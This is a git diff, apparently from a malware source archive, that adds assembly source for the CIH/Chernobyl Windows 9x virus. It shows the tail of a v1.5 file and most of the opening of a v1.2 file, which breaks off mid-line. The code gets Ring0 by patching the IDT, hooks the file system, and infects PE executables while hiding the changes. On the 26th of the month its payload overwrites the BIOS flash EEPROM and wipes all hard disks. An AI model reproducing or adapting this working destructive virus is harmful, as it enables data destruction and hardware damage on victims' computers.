+; *************************** +; * Let's Get * +; * Total Size of Sections * +; *************************** + + mov al, SizeOfScetionTable + ; I Assume NumberOfSections <= 0ffh + mov cl, (NumberOfSections-@8)[esi] + mul cl + +; *************************** +; * Let's Set Section Table * +; *************************** + + ; Move ESI to the Start of SectionTable + lea esi, (StartOfSectionTable-@8)[esi] + push eax ; Size + push edx ; Pointer of File + push esi ; Address of Buffer + +; *************************** +; * The Code Size of Merge * +; * Virus Code Section and * +; * Total Size of Virus * +; * Code Section Table Must * +; * be Small or Equal the * +; * Unused Space Size of * +; * Following Section Table * +; *************************** + + inc ecx + push ecx ; Save NumberOfSections+1 + shl ecx, 03h + push ecx ; Save TotalSizeOfVirusCodeSectionTable + + add ecx, eax + add ecx, edx + sub ecx, (SizeOfHeaders-@9)[esi] + not ecx + inc ecx + ; Save My Virus First Section Code + ; Size of Following Section Table... + ; ( Not Include the Size of Virus Code Section Table ) + push ecx + xchg ecx, eax ; ECX = Size of Section Table + ; Save Original Address of Entry Point + mov eax, (AddressOfEntryPoint-@9)[esi] + add eax, (ImageBase-@9)[esi] + mov (OriginalAddressOfEntryPoint-@9)[esi], eax + cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection + jl OnlySetInfectedMark + +; *************************** +; * Read All Section Tables * +; *************************** + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Full Modify the Bug : * +; * WinZip Self-Extractor * +; * Occurs Error... * +; *************************** +; * So When User Opens * +; * WinZip Self-Extractor, * +; * Virus Doesn't Infect it.* +; *************************** +; * First, Virus Gets the * +; * PointerToRawData in the * +; * Second Section Table, * +; * Reads the Section Data, * +; * and Tests the String of * +; * 'WinZip(R)'...... * +; *************************** + + xchg eax, ebp + push 00000004h + pop ecx + push edx + mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi] + add edx, 12h + call edi ; VXDCall IFSMgr_Ring0_FileIO + cmp dword ptr [esi], 'piZniW' + je NotSetInfectedMark + pop edx + +; *************************** +; * Let's Set Total Virus * +; * Code Section Table * +; *************************** + + ; EBX = My Virus First Section Code + ; Size of Following Section Table + pop ebx + pop edi ; EDI = TotalSizeOfVirusCodeSectionTable + pop ecx ; ECX = NumberOfSections+1 + push edi ; Size + add edx, ebp + push edx ; Pointer of File + add ebp, esi + push ebp ; Address of Buffer + +; *************************** +; * Set the First Virus * +; * Code Section Size in * +; * VirusCodeSectionTable * +; *************************** + + lea eax, [ebp+edi-04h] + mov [eax], ebx + +; *************************** +; * Let's Set My Virus * +; * First Section Code * +; *************************** + + push ebx ; Size + add edx, edi + push edx ; Pointer of File + lea edi, (MyVirusStart-@9)[esi] + push edi ; Address of Buffer + +; *************************** +; * Let's Modify the * +; * AddressOfEntryPoint to * +; * My Virus Entry Point * +; *************************** + + mov (NewAddressOfEntryPoint-@9)[esi], edx + +; *************************** +; * Setup Initial Data * +; *************************** + + lea edx, [esi-SizeOfScetionTable] + mov ebp, offset VirusSize + jmp StartToWriteCodeToSections + +; *************************** +; * Write Code to Sections * +; *************************** + +LoopOfWriteCodeToSections: + + add edx, SizeOfScetionTable + mov ebx, (SizeOfRawData-@9)[edx] + sub ebx, (VirtualSize-@9)[edx] + jbe EndOfWriteCodeToSections + push ebx ; Size + sub eax, 08h + mov [eax], ebx + mov ebx, (PointerToRawData-@9)[edx] + add ebx, (VirtualSize-@9)[edx] + push ebx ; Pointer of File + push edi ; Address of Buffer + mov ebx, (VirtualSize-@9)[edx] + add ebx, (VirtualAddress-@9)[edx] + add ebx, (ImageBase-@9)[esi] + mov [eax+4], ebx + mov ebx, [eax] + add (VirtualSize-@9)[edx], ebx + + ; Section contains initialized data ==> 00000040h + ; Section can be Read. ==> 40000000h + or (Characteristics-@9)[edx], 40000040h + +StartToWriteCodeToSections: + + sub ebp, ebx + jbe SetVirusCodeSectionTableEndMark + add edi, ebx ; Move Address of Buffer + +EndOfWriteCodeToSections: + + loop LoopOfWriteCodeToSections + +; *************************** +; * Only Set Infected Mark * +; *************************** + +OnlySetInfectedMark: + mov esp, dr1 + jmp WriteVirusCodeToFile + +; *************************** +; * Not Set Infected Mark * +; *************************** + +NotSetInfectedMark: + add esp, 3ch + jmp CloseFile + +; *************************** +; * Set Virus Code * +; * Section Table End Mark * +; *************************** + +SetVirusCodeSectionTableEndMark: + + ; Adjust Size of Virus Section Code to Correct Value + add [eax], ebp + add [esp+08h], ebp + + ; Set End Mark + xor ebx, ebx + mov [eax-04h], ebx + +; *************************** +; * When VirusGame Calls * +; * VxDCall, VMM Modifies * +; * the 'int 20h' and the * +; * 'Service Identifier' * +; * to 'Call [XXXXXXXX]'. * +; *************************** +; * Before Writing My Virus * +; * to File, I Must Restore * +; * them First. ^__^ * +; *************************** + + lea eax, (LastVxDCallAddress-2-@9)[esi] + mov cl, VxDCallTableSize + +LoopOfRestoreVxDCallID: + mov word ptr [eax], 20cdh + mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] + mov [eax+2], edx + movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] + sub eax, edx + loop LoopOfRestoreVxDCallID + +; *************************** +; * Let's Write * +; * Virus Code to the File * +; *************************** + +WriteVirusCodeToFile: + mov eax, dr1 + mov ebx, [eax+10h] + mov edi, [eax] + +LoopOfWriteVirusCodeToFile: + + pop ecx + jecxz SetFileModificationMark + mov esi, ecx + mov eax, 0d601h + pop edx + pop ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO + jmp LoopOfWriteVirusCodeToFile + +; *************************** +; * Let's Set CF = 1 ==> * +; * Need to Restore File * +; * Modification Time * +; *************************** + +SetFileModificationMark: + pop ebx + pop eax + stc ; Enable CF(Carry Flag) + pushf + +; ************************************* +; * Close File * +; ************************************* + +CloseFile: + xor eax, eax + mov ah, 0d7h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Need to Restore File Modification * +; * Time !? * +; ************************************* + + popf + pop esi + jnc IsKillComputer + +; ************************************* +; * Restore File Modification Time * +; ************************************* + + mov ebx, edi + mov ax, 4303h + mov ecx, (FileModificationTime-@7)[esi] + mov edi, (FileModificationTime+2-@7)[esi] + call ebx ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Disable OnBusy * +; ************************************* + +DisableOnBusy: + dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy + +; ************************************* +; * Call Previous FileSystemApiHook * +; ************************************* + +prevhook: + popad + mov eax, dr0 ; + jmp [eax] ; Jump to prevhook + +; ************************************* +; * Call the Function that the IFS * +; * Manager Would Normally Call to * +; * Implement this Particular I/O * +; * Request. * +; ************************************* + +pIFSFunc: + mov ebx, esp + push dword ptr [ebx+20h+04h+14h] ; Push pioreq + call [ebx+20h+04h] ; Call pIFSFunc + pop ecx ; + mov [ebx+1ch], eax ; Modify EAX Value in Stack + +; *************************** +; * After Calling pIFSFunc, * +; * Get Some Data from the * +; * Returned pioreq. * +; *************************** + + cmp dword ptr [ebx+20h+04h+04h], 00000024h + jne QuitMyVirusFileSystemHook + +; ***************** +; * Get the File * +; * Modification * +; * Date and Time * +; * in DOS Format.* +; ***************** + + mov eax, [ecx+28h] + mov (FileModificationTime-@6)[esi], eax + +; *************************** +; * Quit My Virus' * +; * IFSMgr_FileSystemHook * +; *************************** + +QuitMyVirusFileSystemHook: + + popad + ret + +; ************************************* +; * Kill Computer !? ... *^_^* * +; ************************************* + +IsKillComputer: + ; Get Now Day from BIOS CMOS + mov al, 07h + out 70h, al + in al, 71h + xor al, 01h ; ??/26/???? + +IF DEBUG + jmp DisableOnBusy +ELSE + jnz DisableOnBusy +ENDIF + +; ************************************** +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; ************************************** + +; *************************** +; * Kill BIOS EEPROM * +; *************************** + + mov bp, 0cf8h + lea esi, IOForEEPROM-@7[esi] + +; *********************** +; * Show BIOS Page in * +; * 000E0000 - 000EFFFF * +; * ( 64 KB ) * +; *********************** + + mov edi, 8000384ch + mov dx, 0cfeh + cli + call esi + +; *********************** +; * Show BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + + mov di, 0058h + dec edx ; and al,0fh + mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h + call esi + +; *********************** +; * Show the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E01FF * +; * ( 512 Bytes ) * +; * , and the Section * +; * of Extra BIOS can * +; * be Writted... * +; *********************** + + lea ebx, EnableEEPROMToWrite-@10[esi] + mov eax, 0e5555h + mov ecx, 0e2aaah + call ebx + mov byte ptr [eax], 60h + push ecx + loop $ + +; *********************** +; * Kill the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E007F * +; * ( 80h Bytes ) * +; *********************** + + xor ah, ah + mov [eax], al + + xchg ecx, eax + loop $ + +; *********************** +; * Show and Enable the * +; * BIOS Main ROM Data * +; * 000E0000 - 000FFFFF * +; * ( 128 KB ) * +; * can be Writted... * +; *********************** + + mov eax, 0f5555h + pop ecx + mov ch, 0aah + call ebx + mov byte ptr [eax], 20h + + loop $ + +; *********************** +; * Kill the BIOS Main * +; * ROM Data in Memory * +; * 000FE000 - 000FE07F * +; * ( 80h Bytes ) * +; *********************** + + mov ah, 0e0h + mov [eax], al + +; *********************** +; * Hide BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + ; or al,10h + mov word ptr (BooleanCalculateCode-@10)[esi], 100ch + call esi + +; *************************** +; * Kill All HardDisk * +; *************************************************** +; * IOR Structure of IOS_SendCommand Needs * +; *************************************************** +; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * +; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * +; *************************************************** + +KillHardDisk: + xor ebx, ebx + mov bh, FirstKillHardDiskNumber + push ebx + sub esp, 2ch + push 0c0001000h + mov bh, 08h + push ebx + push ecx + push ecx + push ecx + push 40000501h + inc ecx + push ecx + push ecx + mov esi, esp + sub esp, 0ach + +LoopOfKillHardDisk: + int 20h + dd 00100004h ; VXDCall IOS_SendCommand + cmp word ptr [esi+06h], 0017h + je KillNextDataSection + +ChangeNextHardDisk: + inc byte ptr [esi+4dh] + jmp LoopOfKillHardDisk + +KillNextDataSection: + add dword ptr [esi+10h], ebx + mov byte ptr [esi+4dh], FirstKillHardDiskNumber + jmp LoopOfKillHardDisk + +; *************************** +; * Enable EEPROM to Write * +; *************************** + +EnableEEPROMToWrite: + mov [eax], cl + mov [ecx], al + mov byte ptr [eax], 80h + mov [eax], cl + mov [ecx], al + ret + +; *************************** +; * IO for EEPROM * +; *************************** + +IOForEEPROM: +@10 = IOForEEPROM + + xchg eax, edi + xchg edx, ebp + out dx, eax + xchg eax, edi + xchg edx, ebp + in al, dx + +BooleanCalculateCode = $ + or al, 44h + xchg eax, edi + xchg edx, ebp + out dx, eax + xchg eax, edi + xchg edx, ebp + out dx, al + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +LastVxDCallAddress = IFSMgr_Ring0_FileIO +VxDCallAddressTable db 00h + db IFSMgr_RemoveFileSystemApiHook-_PageAllocate + db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook + db IFSMgr_Ring0_FileIO-UniToBCSPath +VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h +VxDCallTableSize = ($-VxDCallIDTable)/04h + +; ********************************************************* +; * Virus Version Copyright * +; ********************************************************* + +VirusVersionCopyright db 'WinCIH ver 1.5 by TATUNG, Thailand' + +; ********************************************************* +; * Virus Size * +; ********************************************************* + +VirusSize = $ +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; * Dynamic Data * +; ********************************************************* + +VirusGameDataStartAddress = VirusSize +@6 = VirusGameDataStartAddress +OnBusy db 0 +FileModificationTime dd ? + +FileNameBuffer db FileNameBufferSize dup(?) +@7 = FileNameBuffer + +DataBuffer = $ +@8 = DataBuffer +NumberOfSections dw ? +TimeDateStamp dd ? +SymbolsPointer dd ? +NumberOfSymbols dd ? +SizeOfOptionalHeader dw ? +_Characteristics dw ? +Magic dw ? +LinkerVersion dw ? +SizeOfCode dd ? +SizeOfInitializedData dd ? +SizeOfUninitializedData dd ? +AddressOfEntryPoint dd ? +BaseOfCode dd ? +BaseOfData dd ? +ImageBase dd ? +@9 = $ +SectionAlignment dd ? +FileAlignment dd ? +OperatingSystemVersion dd ? +ImageVersion dd ? +SubsystemVersion dd ? +Reserved dd ? +SizeOfImage dd ? +SizeOfHeaders dd ? +SizeOfImageHeaderToRead = $-NumberOfSections +NewAddressOfEntryPoint = DataBuffer ; DWORD +SizeOfImageHeaderToWrite= 04h +StartOfSectionTable = @9 +SectionName = StartOfSectionTable ; QWORD +VirtualSize = StartOfSectionTable+08h ; DWORD +VirtualAddress = StartOfSectionTable+0ch ; DWORD +SizeOfRawData = StartOfSectionTable+10h ; DWORD +PointerToRawData = StartOfSectionTable+14h ; DWORD +PointerToRelocations = StartOfSectionTable+18h ; DWORD +PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD +NumberOfRelocations = StartOfSectionTable+20h ; WORD +NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD +Characteristics = StartOfSectionTable+24h ; DWORD +SizeOfScetionTable = Characteristics+04h-SectionName + +; ********************************************************* +; * Virus Total Need Memory * +; ********************************************************* + +VirusNeedBaseMemory = $ +VirusTotalNeedMemory = @9 +; + NumberOfSections(??)*SizeOfScetionTable(28h) +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) +; ********************************************************* + +VirusGame ENDS + END FileHeader diff --git a/MSDOS/Virus.MSDOS.Unknown.cih_12.asm b/MSDOS/Virus.MSDOS.Unknown.cih_12.asm new file mode 100644 index 00000000..044ca02d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cih_12.asm @@ -0,0 +1,1480 @@ +; **************************************************************************** +; * The Virus Program Information * +; **************************************************************************** +; * * +; * Designer : CIH Original Place : TTIT of Taiwan * +; * Create Date : 04/26/1998 Now Version : 1.2 * +; * Modification Time : 05/21/1998 * +; * * +; *==========================================================================* +; * Modification History * +; *==========================================================================* +; * v1.0 1. Create the Virus Program. * +; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * +; * 04/26/1998 3. Virus Code doesn't Reload into System. * +; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * +; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * +; * 6. When System Opens Existing PE File, the File will be * +; * Infected, and the File doesn't be Reinfected. * +; * 7. It is also Infected, even the File is Read-Only. * +; * 8. When the File is Infected, the Modification Date and Time * +; * of the File also don't be Changed. * +; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * +; * Previous FileSystemApiHook, it will Call the Function * +; * that the IFS Manager Would Normally Call to Implement * +; * this Particular I/O Request. * +; * 10. The Virus Size is only 656 Bytes. * +; *==========================================================================* +; * v1.1 1. Especially, the File that be Infected will not Increase * +; * it's Size... ^__^ * +; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * +; * When Exception Error Occurs, Our OS System should be in * +; * Windows NT. So My Cute Virus will not Continue to Run, * +; * it will Jmup to Original Application to Run. * +; * 3. Use Better Algorithm, Reduce Virus Code Size. * +; * 4. The Virus "Basic" Size is only 796 Bytes. * +; *==========================================================================* +; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * +; * 2. Modify the Bug of v1.1 * +; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * +; **************************************************************************** + + .586P + +; **************************************************************************** +; * Original PE Executable File(Don't Modify this Section) * +; **************************************************************************** + +OriginalAppEXE SEGMENT + +FileHeader: + db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h + db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h + db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh + db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h + db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h + db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh + db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh + db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h + db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah + db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h + db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h + db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + dd 00000000h, VirusSize + +OriginalAppEXE ENDS + +; **************************************************************************** +; * My Virus Game * +; **************************************************************************** + +; ********************************************************* +; * Constant Define * +; ********************************************************* + +TRUE = 1 +FALSE = 0 + +DEBUG = TRUE + +MajorVirusVersion = 1 +MinorVirusVersion = 2 + +VirusVersion = MajorVirusVersion*10h+MinorVirusVersion + + +IF DEBUG + + FirstKillHardDiskNumber = 81h + HookExceptionNumber = 05h + +ELSE + + FirstKillHardDiskNumber = 80h + HookExceptionNumber = 03h + +ENDIF + + +FileNameBufferSize = 7fh + +; ********************************************************* +; ********************************************************* + +VirusGame SEGMENT + + ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame + ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame + +; ********************************************************* +; * Ring3 Virus Game Initial Program * +; ********************************************************* + +MyVirusStart: + push ebp + +; ************************************* +; * Let's Modify Structured Exception * +; * Handing, Prevent Exception Error * +; * Occurrence, Especially in NT. * +; ************************************* + + lea eax, [esp-04h*2] + + xor ebx, ebx + xchg eax, fs:[ebx] + + call @0 +@0: + pop ebx + + lea ecx, StopToRunVirusCode-@0[ebx] + push ecx + + push eax + +; ************************************* +; * Let's Modify * +; * IDT(Interrupt Descriptor Table) * +; * to Get Ring0 Privilege... * +; ************************************* + + push eax ; + sidt [esp-02h] ; Get IDT Base Address + pop ebx ; + + add ebx, HookExceptionNumber*08h+04h ; ZF = 0 + + cli + + mov ebp, [ebx] ; Get Exception Base + mov bp, [ebx-04h] ; Entry Point + + lea esi, MyExceptionHook-@1[ecx] + + push esi + + mov [ebx-04h], si ; + shr esi, 16 ; Modify Exception + mov [ebx+02h], si ; Entry Point Address + + pop esi + +; ************************************* +; * Generate Exception to Get Ring0 * +; ************************************* + + int HookExceptionNumber ; GenerateException +ReturnAddressOfEndException = $ + +; ************************************* +; * Merge All Virus Code Section * +; ************************************* + + push esi + mov esi, eax + +LoopOfMergeAllVirusCodeSection: + + mov ecx, [eax-04h] + + rep movsb + + sub eax, 08h + + mov esi, [eax] + + or esi, esi + jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 + + jmp LoopOfMergeAllVirusCodeSection + +QuitLoopOfMergeAllVirusCodeSection: + + pop esi + +; ************************************* +; * Generate Exception Again * +; ************************************* + + int HookExceptionNumber ; GenerateException Again + +; ************************************* +; * Let's Restore * +; * Structured Exception Handing * +; ************************************* + +ReadyRestoreSE: + sti + + xor ebx, ebx + + jmp RestoreSE + +; ************************************* +; * When Exception Error Occurs, * +; * Our OS System should be in NT. * +; * So My Cute Virus will not * +; * Continue to Run, it Jmups to * +; * Original Application to Run. * +; ************************************* + +StopToRunVirusCode: +@1 = StopToRunVirusCode + + xor ebx, ebx + mov eax, fs:[ebx] + mov esp, [eax] + +RestoreSE: + pop dword ptr fs:[ebx] + pop eax + +; ************************************* +; * Return Original App to Execute * +; ************************************* + + pop ebp + + push 00401000h ; Push Original +OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack + + ret ; Return to Original App Entry Point + +; ********************************************************* +; * Ring0 Virus Game Initial Program * +; ********************************************************* + +MyExceptionHook: +@2 = MyExceptionHook + + jz InstallMyFileSystemApiHook + +; ************************************* +; * Do My Virus Exist in System !? * +; ************************************* + + mov ecx, dr0 + jecxz AllocateSystemMemoryPage + + add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException + +; ************************************* +; * Return to Ring3 Initial Program * +; ************************************* + +ExitRing0Init: + mov [ebx-04h], bp ; + shr ebp, 16 ; Restore Exception + mov [ebx+02h], bp ; + + iretd + +; ************************************* +; * Allocate SystemMemory Page to Use * +; ************************************* + +AllocateSystemMemoryPage: + + mov dr0, ebx ; Set the Mark of My Virus Exist in System + + push 00000000fh ; + push ecx ; + push 0ffffffffh ; + push ecx ; + push ecx ; + push ecx ; + push 000000001h ; + push 000000002h ; + int 20h ; VMMCALL _PageAllocate +_PageAllocate = $ ; + dd 00010053h ; Use EAX, ECX, EDX, and flags + add esp, 08h*04h + + xchg edi, eax ; EDI = SystemMemory Start Address + + lea eax, MyVirusStart-@2[esi] + + iretd ; Return to Ring3 Initial Program + +; ************************************* +; * Install My File System Api Hook * +; ************************************* + +InstallMyFileSystemApiHook: + + lea eax, FileSystemApiHook-@6[edi] + + push eax ; + int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook +IFSMgr_InstallFileSystemApiHook = $ ; + dd 00400067h ; Use EAX, ECX, EDX, and flags + + mov dr0, eax ; Save OldFileSystemApiHook Address + + pop eax ; EAX = FileSystemApiHook Address + + ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point + mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] + mov edx, [ecx] + mov OldInstallFileSystemApiHook-@3[eax], edx + + ; Modify IFSMgr_InstallFileSystemApiHook Entry Point + lea eax, InstallFileSystemApiHook-@3[eax] + mov [ecx], eax + + cli + + jmp ExitRing0Init + +; ********************************************************* +; * Code Size of Merge Virus Code Section * +; ********************************************************* + +CodeSizeOfMergeVirusCodeSection = offset $ + +; ********************************************************* +; * IFSMgr_InstallFileSystemApiHook * +; ********************************************************* + +InstallFileSystemApiHook: + push ebx + + call @4 ; +@4: ; + pop ebx ; mov ebx, offset FileSystemApiHook + add ebx, FileSystemApiHook-@4 ; + + push ebx + int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook +IFSMgr_RemoveFileSystemApiHook = $ + dd 00400068h ; Use EAX, ECX, EDX, and flags + pop eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link Client FileSystemApiHook + push dword ptr [esp+8] + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + + push eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link My FileSystemApiHook + push ebx + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + + mov dr0, eax ; Adjust OldFileSystemApiHook Address + + pop eax + + pop ebx + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +OldInstallFileSystemApiHook dd ? + +; ********************************************************* +; * IFSMgr_FileSystemHook * +; ********************************************************* + +; ************************************* +; * IFSMgr_FileSystemHook Entry Point * +; ************************************* + +FileSystemApiHook: +@3 = FileSystemApiHook + + pushad + + call @5 ; +@5: ; + pop esi ; mov esi, offset VirusGameDataStartAddress + add esi, VirusGameDataStartAddress-@5 + +; ************************************* +; * Is OnBusy !? * +; ************************************* + + test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) + jnz pIFSFunc ; goto pIFSFunc + +; ************************************* +; * Is OpenFile !? * +; ************************************* + + ; if ( NotOpenFile ) + ; goto prevhook + lea ebx, [esp+20h+04h+04h] + cmp dword ptr [ebx], 00000024h + jne prevhook + +; ************************************* +; * Enable OnBusy * +; ************************************* + + inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy + +; ************************************* +; * Get FilePath's DriveNumber, * +; * then Set the DriveName to * +; * FileNameBuffer. * +; ************************************* +; * Ex. If DriveNumber is 03h, * +; * DriveName is 'C:'. * +; ************************************* + + ; mov esi, offset FileNameBuffer + add esi, FileNameBuffer-@6 + + push esi + + mov al, [ebx+04h] + cmp al, 0ffh + je CallUniToBCSPath + + add al, 40h + mov ah, ':' + + mov [esi], eax + + inc esi + inc esi + +; ************************************* +; * UniToBCSPath * +; ************************************* +; * This Service Converts * +; * a Canonicalized Unicode Pathname * +; * to a Normal Pathname in the * +; * Specified BCS Character Set. * +; ************************************* + +CallUniToBCSPath: + push 00000000h + push FileNameBufferSize + mov ebx, [ebx+10h] + mov eax, [ebx+0ch] + add eax, 04h + push eax + push esi + int 20h ; VXDCall UniToBCSPath +UniToBCSPath = $ + dd 00400041h + add esp, 04h*04h + +; ************************************* +; * Is FileName '.EXE' !? * +; ************************************* + + ; cmp [esi+eax-04h], '.EXE' + cmp [esi+eax-04h], 'EXE.' + pop esi + jne DisableOnBusy + +IF DEBUG + +; ************************************* +; * Only for Debug * +; ************************************* + + ; cmp [esi+eax-06h], 'FUCK' + cmp [esi+eax-06h], 'KCUF' + jne DisableOnBusy + +ENDIF + +; ************************************* +; * Is Open Existing File !? * +; ************************************* + + ; if ( NotOpenExistingFile ) + ; goto DisableOnBusy + cmp word ptr [ebx+18h], 01h + jne DisableOnBusy + +; ************************************* +; * Get Attributes of the File * +; ************************************* + + mov 